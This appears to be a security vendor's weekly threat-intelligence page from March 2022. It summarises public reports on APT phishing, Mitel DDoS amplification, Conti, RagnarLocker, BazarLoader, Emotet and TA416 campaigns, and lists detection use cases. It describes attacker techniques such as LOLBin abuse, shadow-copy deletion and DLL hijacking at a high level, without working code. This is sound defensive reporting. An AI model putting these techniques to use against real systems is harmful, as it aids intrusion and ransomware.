The Anvilogic Threat Reports

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge.

We are committed to (read more…)

Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks by helping your team look for malicious exploit strings, as well as, run exposure checks on your endpoint devices/servers, which can help identify a successful payload delivery and compromise using this vulnerability.

Intelligence Levels
  • Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
  • Strategic: General information security news, for awareness
About the Team

The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.

Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.

Our Craft

Curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our crafts are:

  • Detections
    • Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
    • Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
  • Reports Hot off the forge:
    • Threat News Reports
    • Trending Threat Reports
    • Research Articles
Want more?

If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at yo@anvilogic.com.

Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.

If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us we’re happy to help: detection.support@anvilogic.com

Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform

(read less…)

Google TAG Provides Update on Russian Threat Groups

March 15, 2022

Google TAG Provides Update on Russian Threat Groups

Industry: Government, Media, Military | Level: Strategic | Source: GoogleTAG

Google’s Threat Analysis Group (TAG) provides an update on threat actor groups, APT28/FancyBear, Ghostwriter/UNC1151 and Mustang Panda/Temp.Hex, focusing attacks against Ukraine. Activity for APT28/FancyBear has identified phishing campaigns conducted to obtain user credentials against a Ukrainian media site. Threat actor group Ghostwriter/UNC1151 has also conducted phishing campaigns targeting the Polish and Ukrainian, government and military. Analysis for China based threat actor group, Mustang Panda/Temp.Hex has identified the distribution of a malicious zip file that downloads a malicious payload.

CVE-2022-26143: TP240PhoneHome

March 15, 2022

CVE-2022-26143: TP240PhoneHome

Industry: N/A | Level: Strategic | Source: Akamai

Analysis of a sharp increase in DDoS attacks, utilizing UDP port 10074, has been observed since mid-February 2022, by a group of researchers in Akamai SIRT, Cloudflare, Lumen Black Lotus Labs, NETSCOUT Arbor ASERT, TELUS, Team Cymru, and The Shadowserver Foundation. The source of the activity has been determined to be from, “MiCollab and MiVoice Business Express collaboration systems produced by Mitel” abusing a service called tp240dvr. An estimated 2600 systems were not properly provisioned as the service is designed to “stress-test its clients in order to facilitate debugging and performance testing” and “is not meant to be exposed to the Internet.” Attackers have utilized the exposed PBX VoIP gateway to execute high volume reflection/amplification DDoS attacks. Internet service providers observed to have been impacted include industries in financial, gaming and logistics. From the researcher’s review the largest observed attack was “approximately 53 million packets-per-second (mpps) and 23 gigabits-per-second (gb/sec). The average packet size for that attack was approximately 60 bytes, with an attack duration of approximately 5 minutes.” Currently Mitel is working towards a patch to disable the exposed system test facility.

Cyber Incident Reporting Bill

March 15, 2022

Cyber Incident Reporting Bill

Industry: Critical Infrastructure | Level: Strategic | Source: TheRecord

As reported by TheRecord, the United States Senate has approved legislation requiring “critical infrastructure operations alert the Cybersecurity and Infrastructure Security Agency (CISA) within 72 hours of a breach and 24 hours if the organization pays a ransom.” The bill was passed to United States President Joe Biden and it is expected to be signed. The legislation, as stated by CISA Director Jen Easterly, would provide intelligence advantages “these reports from our private sector partners [will be used] to build a common understanding of how our adversaries are targeting U.S. networks and critical infrastructure.”

CaddyWiper Data Wiper Attacks Ukraine

March 15, 2022

Initially discovered by ESET researchers and reported by BleepingComputer, a new data-destroying malware, named CaddyWiper, is attacking Ukrainian organizations.

CISA Update on Conti Ransomware

March 15, 2022

CISA Update on Conti Ransomware

Industry: N/A | Level: Tactical | Source: CISA

The Cybersecurity & Infrastructure Security Agency (CISA), updates alert AA21-265A, tracking Conti ransomware providing new indicators of compromise (IOC) associated with the group. The most prevalent attack vectors, the agency warns for Conti, include the use of Trickbot and Cobalt Stike. The Conti Group has impacted over 1,000 organizations against the U.S and internationally. A variety of techniques has been observed by the ransomware group, with initial access obtained typically through phishing emails or stolen accounts. A variety of post-compromise techniques are provided by CISA including RDP brute force attack, Kerberos attacks, running discovery command to enumerate the network, spread via SMB, stop services and deleting shadow copies.

  • Anvilogic Use Cases:
    • RDP Brute-force Detection
    • Kerberos RC4 Encrypted Tickets
    • Common Reconnaissance Commands
    • Windows Share Multiple File Access
    • Service Stop Commands
    • Inhibit System Recovery Commands

RagnarLoocker – FBI Flash Report

March 15, 2022

RagnarLoocker – FBI Flash Report

Industry: Energy, Financial Services, Government, Information Technology and Manufacturing | Level: Tactical | Source: DocumentCloud

The United States Federal Bureau of Investigation provides an update of RagnarLocker ransomware, which the bureau has been tracking since April 2020. The ransomware family has made significant impacts, “As of January 2022, the FBI has identified at least 52 entities across 10 critical manufacturing, energy, financial services, government and information technology sectors.” The ransomware does a system check on the victim host and terminates if the following locations are identified; Azerbaijani, Armenian, Belorussian, Kazakh, Kyrgyz, Moldavian, Tajik, Russian, Turkmen, Uzbek, Ukrainian, or Georgian. Prior to encryption the ransomware will delete shadow copies. Not all files are encrypted on the victim host as only “all available files of interest” are encrypted.

BazarLoader Malware Leverages Contact Forms

March 15, 2022

BazarLoader Malware Leverages Contact Forms

Industry: N/A | Level: Tactical | Source: AbnormalSecurity

Abnormal Security has observed, BazarLoader to be incorporating online contact forms in its communication and distribution tactic. This recent campaign occurred between December 2021 to January 2022, in which threat actors would pose as a prospective customer looking to obtain a product supply quote. As the communication would appear genuine, the targeted company would typically follow-up the inquiry by initiating an email to which the attacker would respond by providing a link to download a malicious file using file sharing services such as TransferNow and WeTransfer. If downloaded, files for a .iso and .log would be dropped on the victim’s workstation. The ISO file is actually a .lnk shortcut file and the .log file is the malicious BazarLoader DLL file. The shortcut file if executed calls regsvr32.exe to run the DLL file in disguise which conducts process injection into svchost.exe. Further analysis of the campaign could not be completed as the command and control (C2) infrastructure was down. The threat actor’s objective is likely to be using BazarLoader to deploy Conti ransomware or Cobalt Strike.

  • Anvilogic Use Cases:
    • Symbolic OR Hard File Link Created
    • regsvr32 Execution

Cybereason LOLBins & BITSadmin

March 15, 2022

Cybereason LOLBins & BITSadmin

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s threat hunting post dives into the usage of Living Off the Land Binaries (LOLBins) and deep dive with the tool BITSadmin. Many malware and ransomware variants abuse trust binaries for threat activities. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins exist that can be reviewed from the LOLbas project on Github, with many detections also available in the Anvilogic Armory. Analysis of BITSAdmin identified the tool has many applicable uses to “create, download, or upload jobs and monitor their progress” as detailed in Microsoft’s documentation. Attackers have leveraged BITSadmin’s capabilities to maliciously download payloads and/or to copy and move files. Various malware such as Astaroth malware, Egregor ransomware and ramnit trojan has utilized BITSadmin.

  • Anvilogic Scenario: Astaroth – Attack Chain with LOLBins
  • Anvilogic Use Cases:
    • BITSadmin Execution
    • Msiexec Abuse
    • Wscript/Cscript Execution
    • regsvr32 Execution
    • Rundll32 Command Line
    • Suspicious process Spawned by Java
    • Certutil File Download

Emotet Surges in Japan

March 15, 2022

Emotet Surges in Japan

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s tracking of Emotet malware in the first quarter of 2022, has identified a surge of Emotet activity against Japanese organizations. Emotet’s distribution has been identified through malicious Excel documents that downloads the malware upon execution. The malware uses regsvr32 to execute a malicious DLL file however it also uses a .ocx file extension. Events following, involve the malware establishing persistence in the registry and conducting reconnaissance activity. Cybereason noticed Emotet in it’s current attacks has not utilized PowerShell for deployment.

  • Anvilogic Scenarios:
    • Emotet Behaviors
    • Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • New AutoRun Registry Key
    • Common Reconnaissance Commands

TA416

March 15, 2022

TA416

Industry: N/A | Level: Tactical | Source: Proofpoint

Proofpoint research provides an update for activity since November 2021, involving Chinese APT group TA416, initiating targeted campaigns against European Diplomatic entities. An increase in activity has been observed since the invasion with Russia in Ukraine has taken place.  A new technique was identified in the group’s phishing campaigns.  Initiallythe threat group utilizes web bugs to profile victims to provide a “sign of life,” indicating to the attackers the victim is active and can be enticed into opening malicious emails. Phishing emails have then been observed to be leveraging “email marketing service SMTP2Go, which allows users to alter the envelope sender field while using a unique sender address generated by the service field while using a unique sender address generated by the service.” The abuse of the SMTP2Go service has enabled the group to impersonate different European organizations. When sending the malicious phishing emails, the threat actor provides a DropBox link containing the malware executable, PlugX in a zip file. Upon execution, the malware establishes persistence through DLL Search Order hijacking using PE file potplayermini.exe associated with a public media player and downloads additional payloads.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Executable File Written to Disk
    • Suspicious File written to Disk